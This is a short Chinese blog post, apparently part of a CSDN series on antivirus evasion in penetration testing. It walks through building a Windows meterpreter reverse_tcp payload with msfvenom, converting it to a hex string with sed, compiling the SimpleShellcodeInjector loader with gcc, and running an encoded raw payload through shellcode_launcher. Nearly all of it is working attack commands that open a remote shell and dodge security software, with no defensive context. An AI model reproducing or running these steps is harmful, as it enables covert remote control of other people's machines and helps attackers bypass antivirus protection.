往期文章
WEB渗透免杀篇-MSF+shellcode免杀-CSDN博客
WEB渗透免杀篇-cshot远程shellcode-CSDN博客
SSI加载
https://github.com/DimopoulosElias/SimpleShellcodeInjector
生成payload(c)
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=12138 -f c -o shellcode.c
执行
cat shellcode.c |grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"
MSF监听 可使用minGW自行编译
gcc SimpleShellcodeInjector.c -o xxx.exe
执行
xxx.exe +生成的编码
shellcode_launcher
https://github.com/clinicallyinane/shellcode_launcher/
生成payload(raw)
>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.0.108 lport=12138 -f raw -o shellcode.raw
加载器加载
>shellcode_launcher.exe -i shellcode.raw